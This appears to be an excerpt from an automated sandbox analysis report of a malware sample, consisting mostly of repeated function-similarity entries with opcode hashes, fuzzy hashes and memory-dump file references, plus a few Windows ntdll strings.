                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                                                                                • Instruction ID: ce6c1f607d2a6b2d55cac5ac16fffaaece6aa13a3f091f64cfb055cf757718a4
                                                                                                                                • Opcode Fuzzy Hash: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                                                                                • Instruction Fuzzy Hash: FC11A933550B02DFEB218F15C880B12B3F2FF54B62F158869E5894F6A2C7B8E890CB10
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7bc29b971aa40d3d023ea582fae90db1cfbd7e26b745f8ede71360290030a35d
                                                                                                                                • Instruction ID: 7773573a964c7da250b4d49012ee5453620145fc31dfdf36d871a75d4bfa36f4
                                                                                                                                • Opcode Fuzzy Hash: 7bc29b971aa40d3d023ea582fae90db1cfbd7e26b745f8ede71360290030a35d
                                                                                                                                • Instruction Fuzzy Hash: 04015E71A11208AFDB14DFA9D84AFAEBBF8EF44714F504066B900EB380DA75DE01CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 70485bc1437e78be8e88c99da28b0124206dd55a0442d293a0dabe9f56f19ec5
                                                                                                                                • Instruction ID: aed03209db7b80d7e36b3a3778aded8d592d1b9c36e27304688327807b4efa9b
                                                                                                                                • Opcode Fuzzy Hash: 70485bc1437e78be8e88c99da28b0124206dd55a0442d293a0dabe9f56f19ec5
                                                                                                                                • Instruction Fuzzy Hash: 93F0BB37742A906BCB226BA29D5DF5A2679EBC0B94F5204E9B6060F2E4DF54CC02C7D0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 387966e6a16569a8c96e39405f4c5d7a1f60e08c176fa2b4aeb67c87477f0cbc
                                                                                                                                • Instruction ID: 1a6f5b7c96ce7d9066c3a39c4a2fef0e0f86529ba2d528f144c44eb5ef136f42
                                                                                                                                • Opcode Fuzzy Hash: 387966e6a16569a8c96e39405f4c5d7a1f60e08c176fa2b4aeb67c87477f0cbc
                                                                                                                                • Instruction Fuzzy Hash: C1010CB4E04309AFDB04DFA9D545A9EB7F4BF08704F108069A915EB381EB74DA00CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 58a6bdb28f9c962c2fdd34ca0725dfc91c0f9a16a7436efbd7dd1aa8799b7bb8
                                                                                                                                • Instruction ID: 6319e16332de69f4032273030504eb4ca31266b7108210684e8ab6b2d43c19e9
                                                                                                                                • Opcode Fuzzy Hash: 58a6bdb28f9c962c2fdd34ca0725dfc91c0f9a16a7436efbd7dd1aa8799b7bb8
                                                                                                                                • Instruction Fuzzy Hash: 53F0A471B10318AFD704DBB9C809AAEB7B8EF44714F00809AF511FB280DA74D9018750
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                                                                                • Instruction ID: 40da5544c97432a5e02ecd1223a3727a55b5c3b4f748006e881514346722f4c5
                                                                                                                                • Opcode Fuzzy Hash: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                                                                                • Instruction Fuzzy Hash: B5F0C876B19394ABEB05C7A48C40FDA7BBAABC0750F0044559D029F280D730D9418650
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d40529d645d4fa114dc0356229f8661963e84f356b2a23f607e0db092da9019a
                                                                                                                                • Instruction ID: 5a97670b1055f87f010fb8da6cb9564c4658be8242fb17e1dc5d605fdc181ce7
                                                                                                                                • Opcode Fuzzy Hash: d40529d645d4fa114dc0356229f8661963e84f356b2a23f607e0db092da9019a
                                                                                                                                • Instruction Fuzzy Hash: 7A01AFB8345780DFF726DB28DD49F2537FABB01B40F5440A0B9129F6E2EB68D9408220
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 21c261ad49aec7a36fe83962da6b84a0a49093e30b3934b9e59fc1a661f37f08
                                                                                                                                • Instruction ID: 023826b646f777213106885c62bd04dfbebbb50d25e3d05550b390184fd7aff3
                                                                                                                                • Opcode Fuzzy Hash: 21c261ad49aec7a36fe83962da6b84a0a49093e30b3934b9e59fc1a661f37f08
                                                                                                                                • Instruction Fuzzy Hash: 88F0CD732483447AF214D64E8C01B2362ABF7A0750F61806AFA058F395EAA2DC018A94
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4d4d03070a56e46f58c2c56d89f0a15b499a2507620808ccd71b0763bd6a8337
                                                                                                                                • Instruction ID: 69445c91c880bad5f03086ad14914e8479f30b06687f6b6bab2d632f3ec269db
                                                                                                                                • Opcode Fuzzy Hash: 4d4d03070a56e46f58c2c56d89f0a15b499a2507620808ccd71b0763bd6a8337
                                                                                                                                • Instruction Fuzzy Hash: 42F0AF702193049FC314DF28C84AA1AB7E4FF88B04F404A5AB8A8DB381EA34E900C796
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                                                • Instruction ID: 444c2df650fbe84147500e92d951c3f639ae5cfaad8d20c5fbecde2a6ca6dc96
                                                                                                                                • Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                                                • Instruction Fuzzy Hash: 04F0BE72614304AFE714CB21CC49B86B3F9EF9C760F2480789805DB2A0FBB2DE00DA14
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: afbd89316b795c857800f13e8b607a0b8763739d9c97770c912ebe860a1c9747
                                                                                                                                • Instruction ID: 540f508b3c09905ab03c089e5bfbcafaf933408bfa528f5b10daa07bf04c2dc2
                                                                                                                                • Opcode Fuzzy Hash: afbd89316b795c857800f13e8b607a0b8763739d9c97770c912ebe860a1c9747
                                                                                                                                • Instruction Fuzzy Hash: A7F0EC74A11248AFDB04EFA8D945AAEB7F4EF08704F504459B915EB381EB74EA00CB54
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 42c2d436eab220306f19871380aeb013b99db9b6a8f6b03e9446fd2f640ad1cc
                                                                                                                                • Instruction ID: dca9b432944ce5f45275ed1a5722535cf9e7e320bb75693f8b36ad593d4db71e
                                                                                                                                • Opcode Fuzzy Hash: 42c2d436eab220306f19871380aeb013b99db9b6a8f6b03e9446fd2f640ad1cc
                                                                                                                                • Instruction Fuzzy Hash: 42F02EB9A093A09EEF11C324C000F4177EBFB033A0F0888A6C4298F511C3E0E880C651
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                                                • Instruction ID: 3ef2fadd7abbca7f09425022cd25454016013583df6b2b849eaab96c9cfef8be
                                                                                                                                • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                                                • Instruction Fuzzy Hash: F3E0EC79A646849FCF12DF55C644F5ABBB5BF84B00F150458A4095F660C764ED40CB40
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                                                • Instruction ID: ae11780ba4f6267ea8c5896b1d2bd916d87142fb5cf36f856d0810e313435453
                                                                                                                                • Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                                                • Instruction Fuzzy Hash: 03D0C932254654AFD7729A1CFC44FC377E9BB88B61F1604A9B119CB151C765EC82C684
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                                                                • Instruction ID: e7b8398bc6f304e6ce014cf6aaad2799485a867bbcd8c5fc81ddeab2aa155f82
                                                                                                                                • Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                                                                • Instruction Fuzzy Hash: 8ED012332061B097DB295A556954F977A15AB81B90F16016D7C0A9BA00C5148C42D7E0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                                                • Instruction ID: 04e960a0abee73c6ab49fe150a92d1bd60ebfaf26d33c3ee78422f98b9d10ad7
                                                                                                                                • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                                                • Instruction Fuzzy Hash: 67D012371D054CBBCB119F65DC41F957BA9E794B60F044020B5088B5A0CA3AE950D584
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                                                • Instruction ID: 88149533b2e321a62c948ce05a2efb73fa49224d9442c6af1a5cf93fb48af3e1
                                                                                                                                • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                                                • Instruction Fuzzy Hash: 34C08C33290648AFC722DF98DD41F427BB9EB98B00F000061F3088B670C631FC20EA88
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                                                • Instruction ID: 0ebe4e4edc7bc808da462f28d8280843418996b11fd89a1765b8fc2e8829f7c6
                                                                                                                                • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                                                • Instruction Fuzzy Hash: 9FD0E979352E80DFD617CB19C994B0973A5BB44F84FC144D0E801CB762D76CDA44CA04
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                                                                • Instruction ID: fcfdff127deffe3589ad37dc8220dbdce320a3c1911a8484cc61b5d39715461b
                                                                                                                                • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                                                                • Instruction Fuzzy Hash: 6AC08CB82412806BFB1A4B04CE14F2876A6BB00B45F80019CEE051D4A1C76AD8018208
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                                                • Instruction ID: 4b2db92fec8784c13a9f217668dc35d14500c1dea9eb899aa4de0e5cd5b2e59d
                                                                                                                                • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                                                • Instruction Fuzzy Hash: 72C002397415508BDF15CA29C684E4977E5BB54740F1504D0E8058B621D724EC00CA10
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4d26a8289107e42d0c3e6262202ff2e72e1c5b662af92b1c63d5eb10808e0b4e
                                                                                                                                • Instruction ID: d4246b5f440d8f8c472b27a91554c8417b742587254acce84d5dbc247b3590eb
                                                                                                                                • Opcode Fuzzy Hash: 4d26a8289107e42d0c3e6262202ff2e72e1c5b662af92b1c63d5eb10808e0b4e
                                                                                                                                • Instruction Fuzzy Hash: 6090026160150052454071584D05406601557E13017D1C95AA0544620CC6288C9DAA69
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 24131695ebc53a5605bfb2bb780f97211fa94c2ebf58278e50708ad177150aac
                                                                                                                                • Instruction ID: edec9a42d7d48248926d64efe627706e8b0e186fa663115b060260fde5ae62d9
                                                                                                                                • Opcode Fuzzy Hash: 24131695ebc53a5605bfb2bb780f97211fa94c2ebf58278e50708ad177150aac
                                                                                                                                • Instruction Fuzzy Hash: 3790022130140412D50261584915606001987D1345FD1C857E1414615DC6358D9BB932
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%


                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: HEAP:
                                                                                                                                • API String ID: 3446177414-2466845122
                                                                                                                                • Opcode ID: 8ff849bbaea91e620cce077c35dcae214c8c0dd3f18178bf64b3de1cd009f536
                                                                                                                                • Instruction ID: 993ba41a7ccdc007cdc6d68ef757e193a6022d714951a0c121d777dbc9df71db
                                                                                                                                • Opcode Fuzzy Hash: 8ff849bbaea91e620cce077c35dcae214c8c0dd3f18178bf64b3de1cd009f536
                                                                                                                                • Instruction Fuzzy Hash: 06A19B756183118FDB04CE28C894A6AB7E6FF88360F04456DED46DB3A1EB70EC46CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 35824507
                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 35824530
                                                                                                                                • Execute=1, xrefs: 3582451E
